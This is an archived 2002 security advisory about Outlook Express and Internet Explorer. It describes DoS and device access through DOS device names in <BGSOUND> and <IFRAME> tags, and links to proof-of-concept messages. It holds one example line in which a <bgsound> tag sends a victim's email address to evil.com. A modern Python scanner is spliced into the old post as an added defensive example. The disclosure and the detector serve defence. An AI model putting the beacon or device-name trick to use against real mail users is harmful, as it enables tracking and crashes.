dH team & SECURITY.NNOV: special device access, information leakage and DoS in Outlook Express

From: ERRor (errorat_private)
Date: Wed May 15 2002 - 04:11:32 PDT


    Original version of this advisory:
    http://www.security.nnov.ru/advisories/msiedos.asp
    
    Title:            Special device access and DoS in Microsoft Internet
                      Explorer/Outlook Express/Outlook
    Authors:          ERRor, 3APA3A
    Date:             May 14, 2002
    Affected:         Internet Explorer 6.0
    Vendor:           Microsoft
    Risk:             Average to high
    Remote:           Yes
    Exploitable:      Yes
    Vendor notified:  April 24, 2002
    
    Intro:
    
    All versions of Windows have reserved filenames that refer to special
    devices such as prn, aux, nul, etc., also called DOS devices. A filename
    for a special device may have any directory path and any extension after
    the dot. For example, c:\temp\prn.tmp refers to the prn device. The same
    API is used to access special devices and regular files. Unauthorized
    access to a special device may be a significant security issue, with
    results ranging from denial of service against a running program or
    service to hardware failure or compromise of protected data.
    
    Problem:
    
    ERRor discovered that the <BGSOUND> tag in conjunction with a special
    device name causes a DoS against Internet Explorer or Outlook Express
    regardless of security zone settings. In Outlook Express it is
    non-trivial to remove the crafted message without losing the message
    folder.
    
    During investigation of this issue, 3APA3A and ERRor found that using the
    <IFRAME> tag it is possible to send arbitrary data to a special device.
    
    Another problem is that, regardless of security zone settings, the source
    specified in a <BGSOUND> tag is always downloaded. This makes it possible
    to fingerprint the remote client by his e-mail address using something
    like

    <bgsound src="http://evil.com/registerme?email=victimat_private">
    
    Remote client fingerprint problem is discussed in [4].
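As an added, defender-side example (not the authors' proof-of-concept messages from [2] and [3]): a check that recognises when a path refers to a DOS device, which is the naming rule the Intro describes, and a scanner that applies that check to <BGSOUND> and <IFRAME> sources in an HTML mail body and also flags external sources, the always-downloaded case described above. The reserved-name list follows Microsoft's documented device names; the tracker.example host and the sample mail body are constructed for this example.

```python
"""Reserved-device-name check and a <bgsound>/<iframe> src scanner.

Added example for this advisory (not the authors' PoC code). The reserved
name list follows Microsoft's documented DOS device names; the sample mail
body below is constructed for this example.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, unquote

# Names Windows maps to devices in every directory and with any extension.
RESERVED_DEVICES = (
    {"CON", "PRN", "AUX", "NUL"}
    | {f"COM{i}" for i in range(1, 10)}
    | {f"LPT{i}" for i in range(1, 10)}
)


def is_reserved_device(path: str) -> bool:
    """Return True if the last component of path names a DOS device.

    c:\\temp\\prn.tmp, LPT1, /share/aux.txt and "prn:" all count: the stem is
    everything before the first '.' or ':' with trailing spaces and dots
    removed, which is the conservative reading of the Win32 rule.
    """
    name = re.split(r"[\\/]", path)[-1].rstrip(" .")
    stem = re.split(r"[.:]", name, maxsplit=1)[0].rstrip(" ")
    return stem.upper() in RESERVED_DEVICES


def classify_src(src: str):
    """Split a src value into ('local', path), ('external', url) or ('other', src)."""
    s = src.strip()
    if re.match(r"^(?:[A-Za-z]:[\\/]|\\\\)", s):      # drive letter or UNC path
        return "local", s
    parts = urlsplit(s)
    scheme = parts.scheme.lower()
    if scheme == "file":
        return "local", unquote(parts.netloc + parts.path)
    if scheme == "":
        return "local", unquote(s)
    if scheme in ("http", "https", "ftp"):
        return "external", s
    return "other", s                                # cid:, mailto:, data: ...


SUSPECT_TAGS = {"bgsound", "iframe"}


class _SrcCollector(HTMLParser):
    """Collect src attributes of the tags the advisory describes."""

    def __init__(self):
        super().__init__()
        self.found = []

    def handle_starttag(self, tag, attrs):
        if tag in SUSPECT_TAGS:
            for name, value in attrs:
                if name == "src" and value:
                    self.found.append((tag, value))


def scan_mail_html(html: str) -> list:
    """Flag bgsound/iframe sources that hit a device or force an external fetch."""
    collector = _SrcCollector()
    collector.feed(html)
    findings = []
    for tag, src in collector.found:
        kind, target = classify_src(src)
        if kind == "local" and is_reserved_device(target):
            findings.append({"tag": tag, "src": src, "reason": "device-name"})
        elif kind == "external":
            findings.append({"tag": tag, "src": src, "reason": "external-fetch"})
    return findings


# Constructed sample mail body: one tracking beacon and one device reference.
SAMPLE_MAIL_HTML = """<html><body>
<p>Invoice attached.</p>
<bgsound src="http://tracker.example/beacon?id=42">
<iframe src="c:\\temp\\prn.tmp" width="1" height="1"></iframe>
<img src="cid:logo">
</body></html>"""

if __name__ == "__main__":
    for finding in scan_mail_html(SAMPLE_MAIL_HTML):
        print(f"{finding['reason']:15} <{finding['tag']}> {finding['src']}")
```

The device check is deliberately stricter than Windows itself (it treats anything before the first dot as the stem, so prn.tmp.txt is also rejected), which is the right trade-off for a mail gateway or an attachment-saving routine; the same function can be used to refuse attachment names before they reach the filesystem.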
    
    
    Exploitation:
    
    You can use [2] to test the DoS against Outlook Express via <BGSOUND>.
    [3] will print a text line on a text printer attached to LPT1 (in Outlook
    Express 6.0) via <IFRAME>.
    
    1. Special device access and DoS in Outlook Express
       http://www.security.nnov.ru/search/news.asp?binid=2010
    2. Outlook Express Special Device DoS POC
       http://www.security.nnov.ru/files/iedos/dos.eml
    3. Outlook Express Special Device access POC
       http://www.security.nnov.ru/files/iedos/print.eml
    4. Security risks associated with using e-mail.
       http://www.security.nnov.ru/articles/uninet/
    
    Vendor:
    
    Microsoft was informed on April 24, 2002. No feedback from the vendor
    since April 25.
    



    This archive was generated by hypermail 2b30 : Wed May 15 2002 - 10:26:32 PDT